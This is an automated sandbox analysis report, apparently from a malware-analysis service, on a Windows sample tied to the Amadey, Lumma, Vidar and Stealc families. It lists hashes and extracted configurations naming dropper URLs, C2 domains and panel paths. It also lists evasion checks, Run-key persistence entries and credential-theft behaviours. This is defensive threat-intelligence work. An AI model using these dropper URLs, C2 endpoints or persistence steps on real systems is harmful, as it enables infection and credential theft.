amadey | 53e550919e4087a4a81da0a462925b7772fa2ddd870e6036a2069347631214e1

Analysis

max time kernel
50s
max time network
151s
platform
windows10-2004_x64
resource
win10v2004-20250313-en
resource tags

arch:x64arch:x86image:win10v2004-20250313-enlocale:en-usos:windows10-2004-x64system
submitted
17/03/2025, 02:47

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

53e550919e4087a4a81da0a462925b7772fa2ddd870e6036a2069347631214e1.exe
Size

2.1MB
MD5

d9f00ea479721f7581810bda98dca097
SHA1

0b438eab56eb426d68bdeb2bd7c6f69af19daca6
SHA256

53e550919e4087a4a81da0a462925b7772fa2ddd870e6036a2069347631214e1
SHA512

af216b63003175ac1a4a135a242b2b26a31fd49dc9988f822a04a920fb47c27961eeb481bc8bc1c4c25fc9e09f407c7e0ae079210481c515442525707773af55
SSDEEP

49152:JEESzuUhMGOiuMWTSby13yX9FIgn3ITa02qmF:JQBbHWTr1493Y+IU

Score

10^/10

amadey healer lumma stealc vidar 092155 e3a5dc9f3619e7e1987b9fcc98b49843 trump credential_access defense_evasion discovery dropper execution persistence pyinstaller spyware stealer trojan upx

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

http://176.113.115.7/mine/random.exe

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

http://176.113.115.7/mine/random.exe

Extracted

Family

amadey

Version

5.21

Botnet

092155

http://176.113.115.6

Attributes

install_dir
bb556cff4a
install_file
rapes.exe
strings_key
a131b127e996a898cd19ffb2d92e481b
url_paths
/Ni9kiput/index.php

rc4.plain

Extracted

Family

lumma

https://kbracketba.shop/api

https://featureccus.shop/api

https://mrodularmall.top/api

https://jowinjoinery.icu/api

https://legenassedk.top/api

https://htardwarehu.icu/api

https://cjlaspcorne.icu/api

https://bugildbett.top/api

https://latchclan.shop/api

https://codxefusion.top/api

https://hardswarehub.today/api

https://pgadgethgfub.icu/api

https://hardrwarehaven.run/api

https://techmindzs.live/api

https://bz2ncodxefusion.top/api

https://quietswtreams.life/api

https://techspherxe.top/api

https://earthsymphzony.today/api

https://loadoutle.life/api

https://gcaliberc.today/api

Extracted

Family

vidar

Version

13.2

Botnet

e3a5dc9f3619e7e1987b9fcc98b49843

https://t.me/g_etcontent

https://steamcommunity.com/profiles/76561199832267488

Attributes

user_agent
Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:135.0) Firefox/135.0

Extracted

Family

stealc

Botnet

trump

http://45.93.20.28

Attributes

url_path
/85a1cacf11314eb8.php

Extracted

Family

lumma

https://codxefusion.top/api

Signatures

Amadey
Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.
trojan amadey
Amadey family
amadey

Detect Vidar Stealer 7 IoCs

stealer

resource	yara_rule
behavioral2/memory/4952-625-0x0000000000400000-0x0000000000429000-memory.dmp	family_vidar_v7
behavioral2/memory/4952-624-0x0000000000400000-0x0000000000429000-memory.dmp	family_vidar_v7
behavioral2/memory/4952-652-0x0000000000400000-0x0000000000429000-memory.dmp	family_vidar_v7
behavioral2/memory/4952-939-0x0000000000400000-0x0000000000429000-memory.dmp	family_vidar_v7
behavioral2/memory/4952-1011-0x0000000000400000-0x0000000000429000-memory.dmp	family_vidar_v7
behavioral2/memory/4952-1026-0x0000000000400000-0x0000000000429000-memory.dmp	family_vidar_v7
behavioral2/memory/4952-681-0x0000000000400000-0x0000000000429000-memory.dmp	family_vidar_v7

Detects Healer an antivirus disabler dropper 3 IoCs

resource	yara_rule
behavioral2/memory/5336-1032-0x0000000000800000-0x0000000000C64000-memory.dmp	healer
behavioral2/memory/5336-1030-0x0000000000800000-0x0000000000C64000-memory.dmp	healer
behavioral2/memory/5336-1460-0x0000000000800000-0x0000000000C64000-memory.dmp	healer

Healer
Healer an antivirus disabler dropper.
dropper healer
Healer family
healer
Lumma Stealer, LummaC
Lumma or LummaC is an infostealer written in C++ first seen in August 2022.
stealer lumma
Lumma family
lumma
Stealc
Stealc is an infostealer written in C++.
stealer stealc
Stealc family
stealc
Vidar
Vidar is an infostealer based on Arkei stealer.
stealer vidar
Vidar family
vidar

Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 10 IoCs

defense_evasion

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	TempCARCQC0C6WTH8NZAOFLQEKZREJRVYPTH.EXE
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	9078a8a5bd.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	rapes.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	7839a22f78.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	3ca9ad24eb.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	TK5GI6UDIAI28SA1401E.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	df0bb5d7c6.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	53e550919e4087a4a81da0a462925b7772fa2ddd870e6036a2069347631214e1.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	rapes.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	483d2fa8a0d53818306efeb32d3.exe

Blocklisted process makes network request 2 IoCs

flow	pid	Process
27	2968	powershell.exe
47	4016	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 5 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
2968	powershell.exe
4016	powershell.exe
1368	powershell.exe
2088	powershell.exe
2252	powershell.exe

Downloads MZ/PE file 11 IoCs

flow	pid	Process
15	632	rapes.exe
15	632	rapes.exe
82	632	rapes.exe
82	632	rapes.exe
27	2968	powershell.exe
47	4016	powershell.exe
83	1020	7839a22f78.exe
104	4656	futors.exe
31	4656	futors.exe
12	632	rapes.exe
89	4656	futors.exe

Uses browser remote debugging 2 TTPs 25 IoCs

Can be used control the browser and steal sensitive information such as credentials and session cookies.

credential_access stealer

Steal Web Session Cookie

T1539

Modify Authentication Process

T1556

pid	Process
5568	msedge.exe
6816	chrome.exe
6808	chrome.exe
6944	chrome.exe
848	msedge.exe
18784	chrome.exe
3940	msedge.exe
2424	chrome.exe
3184	chrome.exe
4800	chrome.exe
3000	chrome.exe
6304	msedge.exe
18660	chrome.exe
14828	chrome.exe
3160	chrome.exe
5988	msedge.exe
7148	chrome.exe
5344	msedge.exe
6000	chrome.exe
6540	msedge.exe
7392	chrome.exe
18772	chrome.exe
5364	msedge.exe
4928	msedge.exe
5716	msedge.exe

Checks BIOS information in registry 2 TTPs 20 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	9078a8a5bd.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	53e550919e4087a4a81da0a462925b7772fa2ddd870e6036a2069347631214e1.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	rapes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	rapes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	3ca9ad24eb.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	TK5GI6UDIAI28SA1401E.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	rapes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	9078a8a5bd.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	483d2fa8a0d53818306efeb32d3.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	7839a22f78.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	3ca9ad24eb.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	df0bb5d7c6.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	rapes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	483d2fa8a0d53818306efeb32d3.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	7839a22f78.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	TK5GI6UDIAI28SA1401E.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	df0bb5d7c6.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	53e550919e4087a4a81da0a462925b7772fa2ddd870e6036a2069347631214e1.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	TempCARCQC0C6WTH8NZAOFLQEKZREJRVYPTH.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	TempCARCQC0C6WTH8NZAOFLQEKZREJRVYPTH.EXE

Checks computer location settings 2 TTPs 6 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-1279544337-3716153908-718418795-1000\Control Panel\International\Geo\Nation	53e550919e4087a4a81da0a462925b7772fa2ddd870e6036a2069347631214e1.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1279544337-3716153908-718418795-1000\Control Panel\International\Geo\Nation	rapes.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1279544337-3716153908-718418795-1000\Control Panel\International\Geo\Nation	amnew.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1279544337-3716153908-718418795-1000\Control Panel\International\Geo\Nation	mshta.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1279544337-3716153908-718418795-1000\Control Panel\International\Geo\Nation	mshta.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1279544337-3716153908-718418795-1000\Control Panel\International\Geo\Nation	futors.exe

Executes dropped EXE 21 IoCs

pid	Process
632	rapes.exe
4524	amnew.exe
4656	futors.exe
1396	cfce26c921.exe
6116	TempCARCQC0C6WTH8NZAOFLQEKZREJRVYPTH.EXE
3436	9078a8a5bd.exe
3976	483d2fa8a0d53818306efeb32d3.exe
2304	futors.exe
3696	rapes.exe
4340	trano1221.exe
1020	7839a22f78.exe
2984	trano1221.exe
748	cronikxqqq.exe
5356	cronikxqqq.exe
2824	3ca9ad24eb.exe
3952	dw.exe
5932	TK5GI6UDIAI28SA1401E.exe
5244	c182c36c7f.exe
3560	v7942.exe
5336	df0bb5d7c6.exe
1376	crypted.exe

Identifies Wine through registry keys 2 TTPs 10 IoCs

Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

defense_evasion

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-1279544337-3716153908-718418795-1000\Software\Wine	483d2fa8a0d53818306efeb32d3.exe
Key opened	\REGISTRY\USER\S-1-5-21-1279544337-3716153908-718418795-1000\Software\Wine	rapes.exe
Key opened	\REGISTRY\USER\S-1-5-21-1279544337-3716153908-718418795-1000\Software\Wine	7839a22f78.exe
Key opened	\REGISTRY\USER\S-1-5-21-1279544337-3716153908-718418795-1000\Software\Wine	3ca9ad24eb.exe
Key opened	\REGISTRY\USER\S-1-5-21-1279544337-3716153908-718418795-1000\Software\Wine	TK5GI6UDIAI28SA1401E.exe
Key opened	\REGISTRY\USER\S-1-5-21-1279544337-3716153908-718418795-1000\Software\Wine	rapes.exe
Key opened	\REGISTRY\USER\S-1-5-21-1279544337-3716153908-718418795-1000\Software\Wine	df0bb5d7c6.exe
Key opened	\REGISTRY\USER\S-1-5-21-1279544337-3716153908-718418795-1000\Software\Wine	53e550919e4087a4a81da0a462925b7772fa2ddd870e6036a2069347631214e1.exe
Key opened	\REGISTRY\USER\S-1-5-21-1279544337-3716153908-718418795-1000\Software\Wine	TempCARCQC0C6WTH8NZAOFLQEKZREJRVYPTH.EXE
Key opened	\REGISTRY\USER\S-1-5-21-1279544337-3716153908-718418795-1000\Software\Wine	9078a8a5bd.exe

Loads dropped DLL 31 IoCs

pid	Process
2984	trano1221.exe
2984	trano1221.exe
2984	trano1221.exe
2984	trano1221.exe
2984	trano1221.exe
2984	trano1221.exe
2984	trano1221.exe
2984	trano1221.exe
2984	trano1221.exe
2984	trano1221.exe
2984	trano1221.exe
2984	trano1221.exe
2984	trano1221.exe
2984	trano1221.exe
2984	trano1221.exe
2984	trano1221.exe
2984	trano1221.exe
2984	trano1221.exe
2984	trano1221.exe
2984	trano1221.exe
2984	trano1221.exe
2984	trano1221.exe
2984	trano1221.exe
2984	trano1221.exe
2984	trano1221.exe
2984	trano1221.exe
2984	trano1221.exe
2984	trano1221.exe
2984	trano1221.exe
2984	trano1221.exe
2984	trano1221.exe

Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001

Adds Run key to start application 2 TTPs 6 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-1279544337-3716153908-718418795-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\cfce26c921.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10238500101\\cfce26c921.exe"	rapes.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1279544337-3716153908-718418795-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\am_no.cmd = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10238510121\\am_no.cmd"	rapes.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1279544337-3716153908-718418795-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\7839a22f78.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10238900101\\7839a22f78.exe"	rapes.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1279544337-3716153908-718418795-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\3ca9ad24eb.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10238910101\\3ca9ad24eb.exe"	rapes.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1279544337-3716153908-718418795-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\c182c36c7f.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10238920101\\c182c36c7f.exe"	rapes.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1279544337-3716153908-718418795-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\df0bb5d7c6.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10238930101\\df0bb5d7c6.exe"	rapes.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

AutoIT Executable 2 IoCs

AutoIT scripts compiled to PE executables.

resource	yara_rule
behavioral2/files/0x0007000000024284-53.dat	autoit_exe
behavioral2/files/0x00090000000241c0-600.dat	autoit_exe

Suspicious use of NtSetInformationThreadHideFromDebugger 10 IoCs

pid	Process
5672	53e550919e4087a4a81da0a462925b7772fa2ddd870e6036a2069347631214e1.exe
632	rapes.exe
6116	TempCARCQC0C6WTH8NZAOFLQEKZREJRVYPTH.EXE
3436	9078a8a5bd.exe
3976	483d2fa8a0d53818306efeb32d3.exe
3696	rapes.exe
1020	7839a22f78.exe
2824	3ca9ad24eb.exe
5932	TK5GI6UDIAI28SA1401E.exe
5336	df0bb5d7c6.exe

Suspicious use of SetThreadContext 3 IoCs

description	pid	Process	procid_target
PID 748 set thread context of 5356	748	cronikxqqq.exe	121
PID 3560 set thread context of 4952	3560	v7942.exe	148
PID 1376 set thread context of 4272	1376	crypted.exe	175

UPX packed file 53 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral2/files/0x0007000000024307-349.dat	upx
behavioral2/files/0x0007000000024302-361.dat	upx
behavioral2/files/0x00070000000242bc-359.dat	upx
behavioral2/memory/2984-385-0x00007FFAFC010000-0x00007FFAFC01F000-memory.dmp	upx
behavioral2/memory/2984-384-0x00007FFAF9F90000-0x00007FFAF9FB3000-memory.dmp	upx
behavioral2/memory/2984-387-0x00007FFAF8A60000-0x00007FFAF8A6D000-memory.dmp	upx
behavioral2/memory/2984-386-0x00007FFAF9E90000-0x00007FFAF9EA9000-memory.dmp	upx
behavioral2/memory/2984-392-0x00007FFAF39E0000-0x00007FFAF3AAD000-memory.dmp	upx
behavioral2/memory/2984-391-0x00007FFAF8A50000-0x00007FFAF8A5D000-memory.dmp	upx
behavioral2/memory/2984-390-0x00007FFAF7AE0000-0x00007FFAF7B16000-memory.dmp	upx
behavioral2/memory/2984-389-0x00007FFAF7B20000-0x00007FFAF7B4D000-memory.dmp	upx
behavioral2/memory/2984-388-0x00007FFAF7B50000-0x00007FFAF7B69000-memory.dmp	upx
behavioral2/memory/2984-432-0x00007FFAF0490000-0x00007FFAF04BB000-memory.dmp	upx
behavioral2/memory/2984-434-0x00007FFAF33F0000-0x00007FFAF34BF000-memory.dmp	upx
behavioral2/memory/2984-433-0x00007FFAF7970000-0x00007FFAF79A3000-memory.dmp	upx
behavioral2/memory/2984-431-0x00007FFAE4440000-0x00007FFAE44FC000-memory.dmp	upx
behavioral2/memory/2984-430-0x00007FFAF30F0000-0x00007FFAF311E000-memory.dmp	upx
behavioral2/memory/2984-429-0x00007FFAE4500000-0x00007FFAE4749000-memory.dmp	upx
behavioral2/memory/2984-428-0x00007FFAF3120000-0x00007FFAF3144000-memory.dmp	upx
behavioral2/memory/2984-438-0x00007FFAF9E90000-0x00007FFAF9EA9000-memory.dmp	upx
behavioral2/memory/2984-460-0x00007FFAFC010000-0x00007FFAFC01F000-memory.dmp	upx
behavioral2/memory/2984-459-0x00007FFAF0490000-0x00007FFAF04BB000-memory.dmp	upx
behavioral2/memory/2984-458-0x00007FFAE4440000-0x00007FFAE44FC000-memory.dmp	upx
behavioral2/memory/2984-457-0x00007FFAF30F0000-0x00007FFAF311E000-memory.dmp	upx
behavioral2/memory/2984-456-0x00007FFAE4500000-0x00007FFAE4749000-memory.dmp	upx
behavioral2/memory/2984-455-0x00007FFAF3120000-0x00007FFAF3144000-memory.dmp	upx
behavioral2/memory/2984-454-0x00007FFAF3CB0000-0x00007FFAF3CC2000-memory.dmp	upx
behavioral2/memory/2984-453-0x00007FFAF3990000-0x00007FFAF39D3000-memory.dmp	upx
behavioral2/memory/2984-452-0x00007FFAF3240000-0x00007FFAF335C000-memory.dmp	upx
behavioral2/memory/2984-451-0x00007FFAF3CD0000-0x00007FFAF3CF6000-memory.dmp	upx
behavioral2/memory/2984-450-0x00007FFAF85E0000-0x00007FFAF85EB000-memory.dmp	upx
behavioral2/memory/2984-449-0x00007FFAF3D00000-0x00007FFAF3D14000-memory.dmp	upx
behavioral2/memory/2984-448-0x00007FFAF3360000-0x00007FFAF33E7000-memory.dmp	upx
behavioral2/memory/2984-446-0x00007FFAE4750000-0x00007FFAE4C70000-memory.dmp	upx
behavioral2/memory/2984-445-0x00007FFAF39E0000-0x00007FFAF3AAD000-memory.dmp	upx
behavioral2/memory/2984-444-0x00007FFAF7970000-0x00007FFAF79A3000-memory.dmp	upx
behavioral2/memory/2984-443-0x00007FFAF8A50000-0x00007FFAF8A5D000-memory.dmp	upx
behavioral2/memory/2984-442-0x00007FFAF7AE0000-0x00007FFAF7B16000-memory.dmp	upx
behavioral2/memory/2984-441-0x00007FFAF7B20000-0x00007FFAF7B4D000-memory.dmp	upx
behavioral2/memory/2984-440-0x00007FFAF7B50000-0x00007FFAF7B69000-memory.dmp	upx
behavioral2/memory/2984-439-0x00007FFAF8A60000-0x00007FFAF8A6D000-memory.dmp	upx
behavioral2/memory/2984-436-0x00007FFAF9F90000-0x00007FFAF9FB3000-memory.dmp	upx
behavioral2/memory/2984-435-0x00007FFAE4C70000-0x00007FFAE5259000-memory.dmp	upx
behavioral2/memory/2984-447-0x00007FFAF33F0000-0x00007FFAF34BF000-memory.dmp	upx
behavioral2/memory/2984-427-0x00007FFAF3CB0000-0x00007FFAF3CC2000-memory.dmp	upx
behavioral2/memory/2984-426-0x00007FFAF3990000-0x00007FFAF39D3000-memory.dmp	upx
behavioral2/memory/2984-425-0x00007FFAF3240000-0x00007FFAF335C000-memory.dmp	upx
behavioral2/memory/2984-424-0x00007FFAF3CD0000-0x00007FFAF3CF6000-memory.dmp	upx
behavioral2/memory/2984-423-0x00007FFAF85E0000-0x00007FFAF85EB000-memory.dmp	upx
behavioral2/memory/2984-422-0x00007FFAF3D00000-0x00007FFAF3D14000-memory.dmp	upx
behavioral2/memory/2984-421-0x00007FFAF3360000-0x00007FFAF33E7000-memory.dmp	upx
behavioral2/memory/2984-398-0x00007FFAE4750000-0x00007FFAE4C70000-memory.dmp	upx
behavioral2/memory/2984-353-0x00007FFAE4C70000-0x00007FFAE5259000-memory.dmp	upx

Drops file in Windows directory 2 IoCs

description	ioc	Process
File created	C:\Windows\Tasks\rapes.job	53e550919e4087a4a81da0a462925b7772fa2ddd870e6036a2069347631214e1.exe
File created	C:\Windows\Tasks\futors.job	amnew.exe

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217

Detects Pyinstaller 1 IoCs

pyinstaller

resource	yara_rule
behavioral2/files/0x0007000000024289-210.dat	pyinstaller

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Program crash 3 IoCs

pid	pid_target	Process	procid_target
384	748	WerFault.exe	120
2252	6924	WerFault.exe	237
14972	8092	WerFault.exe	238

System Location Discovery: System Language Discovery 1 TTPs 41 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	7839a22f78.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	dw.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	53e550919e4087a4a81da0a462925b7772fa2ddd870e6036a2069347631214e1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	rapes.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cfce26c921.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	3ca9ad24eb.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	c182c36c7f.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\Language	c182c36c7f.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskkill.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	TempCARCQC0C6WTH8NZAOFLQEKZREJRVYPTH.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cronikxqqq.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	TK5GI6UDIAI28SA1401E.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	df0bb5d7c6.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	mshta.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	483d2fa8a0d53818306efeb32d3.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	SCHTASKS.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\Language\InstallLanguage	c182c36c7f.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskkill.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskkill.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskkill.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskkill.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MSBuild.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	9078a8a5bd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cronikxqqq.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MSBuild.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	amnew.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	futors.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	mshta.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	timeout.exe

Checks processor information in registry 2 TTPs 24 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision	firefox.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	MSBuild.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	MSBuild.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	3ca9ad24eb.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	3ca9ad24eb.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature	firefox.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe
